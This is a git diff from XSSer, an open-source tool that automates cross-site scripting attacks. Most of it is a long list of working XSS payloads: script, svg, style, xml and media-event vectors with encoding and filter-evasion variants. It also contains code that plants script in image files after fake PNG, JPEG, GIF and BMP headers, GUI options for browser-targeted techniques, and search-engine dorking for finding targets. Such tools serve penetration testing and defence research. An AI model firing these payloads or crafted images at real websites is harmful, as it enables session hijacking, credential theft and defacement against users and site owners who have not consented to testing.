+        { 'payload':'''<script>/* */alert(PAYLOAD)// */</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(\'\\/\\PAYLOAD\\/\\\')</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(\'\\\\PAYLOAD\\\\\')</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(\'PAYLOAD\')</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD)<!-- '</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD)</script>;''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD)</script>/''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':''''`"><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''' '><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''''><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\<svg/onload=alert`PAYLOAD`\>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':''''"`><script>/* *alert(PAYLOAD)// */</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''’><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“<script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“><<script>alert(PAYLOAD);//<</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“><script >alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“><script >alert(PAYLOAD)</script >''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''&<script>alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''#<script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“><ScRiPt>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''“><ScRiPt>alert(PAYLOAD)</ScRiPt>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<<SCRIPT>alert(PAYLOAD);//<</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT> alert(\"PAYLOAD\")</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT> alert(\"PAYLOAD\");</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT>alert(PAYLOAD);</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD)<script></script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert%28PAYLOAD%29</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(alert(PAYLOAD))</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''&'"><script>alert(/PAYLOAD/)</āăą>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!-- --!><script>alert(PAYLOAD)</script>-->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''&'"><script>alert(/PAYLOAD/)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(/PAYLOAD/)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert("/PAYLOAD"/)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''”><script>alert(“PAYLOAD”)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\"><script>alert(/PAYLOAD/)<script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<ScriPt>ALeRt(“ PAYLOAD ”)</scriPt>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<<SCRIPT>alert("PAYLOAD");//<</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT>+alert("PAYLOAD")</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT>+alert("PAYLOAD");</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''&'"><script>alert&lpar;&sol;PAYLOAD&sol;&rpar;<&sol;script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script Y>/*<script* */alert(PAYLOAD)</script''',
+          'browser':"""[ALL]"""},
+        { 'payload':'''<SCRIPT <B>alert(PAYLOAD);</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%C2%85javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%C2%A0javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script charset="%22>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script charset='utf-8'>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script> chr=String.fromCharCode(PAYLOAD); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%25/.Y(result)&&result.length) { ids.push(PAYLOAD); } </script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%25/.Y(result)&&result.length) { ids.push(PAYLOAD); } </script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(PAYLOAD)',384,null,'rsa-dual-use')</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%E1%9A%80javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%E1%A0%8Ejavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>eval(‘a%006cert(PAYLOAD)’);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>eval(‘a\154ert(PAYLOAD)’);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>eval(‘a%6cert(PAYLOAD)’);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>eval(‘a\l\ert\(PAYLOAD\)’);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>eval(‘al’+’ert(PAYLOAD)’);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>execScript(“MsgBox PAYLOAD”,”vbscript”);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%F0%90%96%9Ajavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>alert(PAYLOAD)</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(PAYLOAD)</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>prompt(PAYLOAD)</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>function::[‘alert’](PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script> function a() {} </script> <img src=PAYLOAD onerror="a();alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script> if ('a'.trim() === '') { alert(PAYLOAD); } </script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>if("x\%E0%B9%92".length==2) { javascript:alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>if("x\%E1%96%89".length==2) { javascript:alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>if("x\%EE%A9%93".length==2) { javascript:alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>if("x\".length==1) { alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>if("x\".length==2) { alert(PAYLOAD);}</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''' style=Y:expression(PAYLOAD) ' \" style=Y:expression(PAYLOAD) \"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style><img src="</style><img src=x onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style><img src="</style><img src=x onerror=javascript:alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style><img src="</style><img src=x onerror=prompt(1)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:alert(PAYLOAD)';</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>@im\port'\ja\vasc\ript:alert("PAYLOAD")';</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert(PAYLOAD)");}</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert(PAYLOAD)");}</STYLE><A CLASS=T></A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.T{background-image:url("javascript:alert('PAYLOAD')");}</STYLE><A CLASS=T></A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>.T{background-image:url("javascript:javascript:alert(PAYLOAD)");}</STYLE><A CLASS=T></A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>li {list-style-image: url("javascript:alert(PAYLOAD)");}</STYLE><UL><LI>Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE>li {list-style-image: url(&quot;javascript:alert(&#39;PAYLOAD&#39;)&quot;);}</STYLE><UL><LI>Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style/onload=<!--&#09;>&#10;alert&#10;&lpar;PAYLOAD&rpar;>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style onLoad style onLoad="javascript:javascript:alert(PAYLOAD)"></style onLoad>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style onreadystatechange=javascript:javascript:alert(PAYLOAD);></style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(PAYLOAD)"></style onReadyStateChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:alert(PAYLOAD)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(PAYLOAD)'}{}*{-o-link-source:current}]{color:red};</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':''''"--></style></script><script>alert("PAYLOAD")</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':''''"--></style></script><script>prompt(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<///style///><span %2F onmousemove='alert&lpar;PAYLOAD&rpar;'>SPAN''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style></style%09<img src="about:blank" onerror=javascript:alert(PAYLOAD)//></style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style></style><img src="about:blank" onerror=alert(PAYLOAD)//></style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style><!--</style><script>alert(PAYLOAD);//--></script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:alert(PAYLOAD)")}</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE TYPE="text/javascript">alert(PAYLOAD);</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE TYPE="text/javascript">alert('PAYLOAD');</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<STYLE TYPE="text/javascript">javascript:alert(PAYLOAD);</STYLE>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<// style=x:expression\28javascript:alert(PAYLOAD)\29>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<// style=x:expression\28write(PAYLOAD)\29>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style>*{x:expression(write(PAYLOAD))}</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(PAYLOAD))}</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(PAYLOAD)//"></svg>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg contentScriptType=text/vbs><script>MsgBox+PAYLOAD''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg/onload=alert(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><style>{font-family&colon;"<iframe/onload=confirm(PAYLOAD)>"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><style><img/src=x onerror=alert(PAYLOAD)// </b>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg><style>&ltimg src=x onerror=alert(PAYLOAD)&gt</svg>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</svg>''<svg><script 'Y'>alert&#x28;PAYLOAD&#x29;''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(PAYLOAD)"></g></svg''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><script>alert(PAYLOAD)</script></svg>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<TABLE BACKGROUND="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<table background="javascript:alert(PAYLOAD)"></table>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<TABLE><TD BACKGROUND="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<TABLE><TD BACKGROUND="javascript:javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<textarea autofocus onfocus=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<textarea onfocus=javascript:alert(PAYLOAD) autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<title>Y<script>alert(PAYLOAD)</script></title>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<title onpropertychange=alert(PAYLOAD)></title><title title=></title>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<title onpropertychange=javascript:alert(PAYLOAD)></title><title title=>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<title onPropertyChange title onPropertyChange="javascript:javascript:alert(PAYLOAD)"></title onPropertyChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<var onmouseover="prompt(PAYLOAD)">Y</var>​''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video onerror="javascript:alert(PAYLOAD)"><source>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video onerror="javascript:javascript:alert(PAYLOAD)"><source>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video poster=javascript:alert(PAYLOAD)//></video>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video poster=javascript:alert(PAYLOAD)//<video poster=javascript:alert(PAYLOAD)//></video>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video poster=javascript:javascript:alert(PAYLOAD)//''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video><source onerror="javascript:javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video><source onerror="prompt(PAYLOAD)"></source></video>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video src=PAYLOAD href=PAYLOAD onerror="javascript:alert(PAYLOAD)"></video>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<video src=PAYLOAD onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#Zault#vml);position:absolute;width:100%25;height:100%25 src=%25(vml)s#PAYLOAD></vmlframe>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''X<form id=Y><input></form><button form=Y onformchange==javascript:alert(PAYLOAD)>X''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''X<form id=Y onforminput=javascript:alert(PAYLOAD)><input></form>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=0><I><B><IMG SRC="javas<!-- -->cript:alert(PAYLOAD)"></B></I></XML>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(PAYLOAD)"&gt;</B></I></XML>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(PAYLOAD);">]]>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(PAYLOAD);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(PAYLOAD);">]]</C><X></xml>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml id="Y" src="%25(htc)s"></xml> <label dataformatas="html" datasrc="#Y" datafld="PAYLOAD"></label>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml id="T" src="Y.htc"></xml><label dataformatas="html" datasrc="#T" datafld="PAYLOAD"></label>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml id="X"><a><b><script>alert(PAYLOAD);</script>;</b></a></xml>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(PAYLOAD)"></xml onPropertyChange>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml> <rect style="height:100%25;width:100%25" id="Y" onmouseover="alert(PAYLOAD)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xml src="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<?xml-stylesheet href="javascript:alert(PAYLOAD)"?><root/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<?xml-stylesheet type="text/css"?><root style="x:expression(write(PAYLOAD))"/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(PAYLOAD);</html:script></html:html>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(PAYLOAD)>]]></payload></x>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(PAYLOAD)//'>  <script> x='<%25' </script> %25>/ alert(PAYLOAD) </script>  XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(PAYLOAD);</x:script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<x style="background:url('x&#1;;color:red;/*')">PAYLOAD</x>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<x style="background:url('x[a];color:red;/*')">PAYLOAD</x>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<x style=behavior:url(#Zault#time2) onbegin=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<x style=x:expression(alert(PAYLOAD))>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''X<x style=`behavior:url(#Zault#time2)` onbegin=`javascript:alert(PAYLOAD)` >''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''X<x style=`behavior:url(#Zault#time2)` onbegin=`write(PAYLOAD)` >''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<form><button formaction=javascript&colon;PAYLOAD>Y''',
+          'browser':"""[Not Info]"""}
+]
diff --git a/xsser/core/globalmap.py b/core/globalmap.py
similarity index 99%
rename from xsser/core/globalmap.py
rename to core/globalmap.py
index 99a69ee..773c33b 100644
--- a/xsser/core/globalmap.py
+++ b/core/globalmap.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/gtkcontroller.py b/core/gtkcontroller.py
old mode 100644
new mode 100755
similarity index 98%
rename from xsser/core/gtkcontroller.py
rename to core/gtkcontroller.py
index b30bc85..fe7f31b
--- a/xsser/core/gtkcontroller.py
+++ b/core/gtkcontroller.py
@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -268,7 +268,7 @@ def fill_combos(self):
         step4_options_w = self.wTree.get_object('combobox_step4')
         step5_options_w = self.wTree.get_object('combobox_step5')
         # ui comboboxes content
-        dorker_options = [ 'yahoo', 'bing']
+        dorker_options = [ 'duck', 'startpage', 'yahoo', 'bing']
         crawlerdeep_options = ['1', '2', '3', '4', '5']
         checkmethod_options = ['GET', 'POST']
         connect_geomap = ['OFF', 'ON']
@@ -347,12 +347,12 @@ def on_quit(self, widget, data=None):
         Callback called when the window is destroyed (close button clicked)
         """
         if self._flying:
-            print("Exiting xsser... please wait until all mosquitoes return to mothership!")
+            print("[Info] Exiting... please wait until all mosquitoes return to mothership!\n")
             self._quitting = True
             self.on_stop_attack()
             self.do_quit()
         else:
-            print("\nbyezZZZzzzz!\n")
+            print("byezZZZzzzz!\n")
             self.do_quit()
 
     def do_quit(self):
@@ -1784,6 +1784,30 @@ def generate_command(self):
             pass
         else:
             command.append("--Quickdefense")
+        # get Technique: Firefox
+        target_entry = self.wTree.get_object('firefox')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Firefox")
+        # get Technique: Chrome
+        target_entry = self.wTree.get_object('chrome')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Chrome")
+        # get Technique: IExplorer
+        target_entry = self.wTree.get_object('iexplorer')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Iexplorer")
+        # get Technique: Opera
+        target_entry = self.wTree.get_object('opera')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Opera")
         # get Final code: Normal Payload
         target_entry = self.wTree.get_object('normalfinal')
         if target_entry.get_active() == False:
diff --git a/xsser/core/imagexss.py b/core/imagexss.py
similarity index 85%
rename from xsser/core/imagexss.py
rename to core/imagexss.py
index f6bb5fc..852019b 100644
--- a/xsser/core/imagexss.py
+++ b/core/imagexss.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -34,16 +32,13 @@ def image_xss(self, filename, payload):
         """
         # check user image name input valid extensions
         root, ext = os.path.splitext(filename)
-        
-	# create file and inject code
+    	# create file and inject code
         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
             f = open(filename, 'wb')
-						                
             # check user payload input
             user_payload = payload
             if not user_payload:
                 user_payload = "<script>alert('XSS')</script>"
-	
             # inject each XSS specific code     
             if ext.lower() == ".png":
                 content = '‰PNG' + user_payload
@@ -53,14 +48,12 @@ def image_xss(self, filename, payload):
                 content = 'ÿØÿà JFIF' + user_payload
             elif ext.lower() == ".bmp":
                 content = 'BMFÖ' + user_payload
-
             # write and close
             f.write(content)
             f.close()
-
-            image_results = "\nCode: "+ content + "\nFile: ", root + ext
+            image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
-            image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
+            image_results = "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"
         return image_results
 
 if __name__ == '__main__':
diff --git a/core/main.py b/core/main.py
new file mode 100644
index 0000000..9babdd2
--- /dev/null
+++ b/core/main.py
@@ -0,0 +1,3522 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the XSSer project, https://xsser.03c8.net
+
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os, re, sys, datetime, hashlib, time, urllib, cgi, traceback, webbrowser, random
+from random import randint
+from base64 import b64encode, b64decode
+import core.fuzzing
+import core.fuzzing.vectors
+import core.fuzzing.DCP
+import core.fuzzing.DOM
+import core.fuzzing.HTTPsr
+import core.fuzzing.heuristic
+from collections import defaultdict
+from itertools import islice, chain
+from urlparse import parse_qs, urlparse
+from core.curlcontrol import Curl
+from core.encdec import EncoderDecoder
+from core.options import XSSerOptions
+from core.dork import Dorker
+from core.crawler import Crawler
+from core.imagexss import ImageInjections
+from core.flashxss import FlashInjections
+from core.post.xml_exporter import xml_reporting
+from core.tokenhub import HubThread
+from core.reporter import XSSerReporter
+from core.threadpool import ThreadPool, NoResultsPending
+from core.update import Updater
+
+# set to emit debug messages about errors (0 = off).
+DEBUG = 0
+
+class xsser(EncoderDecoder, XSSerReporter):
+    """
+    XSSer application class
+    """
+    def __init__(self, mothership=None):
+        self._reporter = None
+        self._reporters = []
+        self._landing = False
+        self._ongoing_requests = 0
+        self._oldcurl = []
+        self._gtkdir = None
+        self._webbrowser = webbrowser
+        self.crawled_urls = []
+        self.checked_urls = []
+        self.successful_urls = []
+        self.urlmalformed = False
+        self.search_engines = [] # available dorking search engines
+        self.search_engines.append('bing') # [26/08/2019: OK!]
+        self.search_engines.append('yahoo') # [26/08/2019: OK!]
+        self.search_engines.append('startpage') # [26/08/2019: OK!]
+        self.search_engines.append('duck') # [26/08/2019: OK!]
+        #self.search_engines.append('google')
+        #self.search_engines.append('yandex')
+        self.user_template = None # wizard user template
+        self.user_template_conntype = "GET" # GET by default
+        self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
+
+        if not mothership:
+            # no mothership so *this* is the mothership
+            # start the communications hub and rock on!
+            self.hub = None
+            self.pool = ThreadPool(0)
+            self.mothership = None
+            self.final_attacks = {}
+        else:
+            self.hub = None
+            self.mothership = mothership
+            self.mothership.add_reporter(self)
+            self.pool = ThreadPool(0)
+            self.final_attacks = self.mothership.final_attacks
+
+        # initialize the url encoder/decoder
+        EncoderDecoder.__init__(self)
+
+        # your unique real opponent
+        self.time = datetime.datetime.now()
+
+        # this payload comes with vector already..
+        self.DEFAULT_XSS_PAYLOAD = 'XSS'
+
+        # to be or not to be...
+        self.hash_found = []
+        self.hash_notfound = []
+
+        # other hashes
+        self.hashed_injections={}
+        self.extra_hashed_injections={}
+        self.extra_hashed_vector_url = {}
+        self.final_hashes = {} # final hashes used by each method
+
+        # some counters for checker systems
+        self.errors_isalive = 0
+        self.next_isalive = False
+        self.flag_isalive_num = 0
+        self.rounds = 0
+        self.round_complete = 0
+        
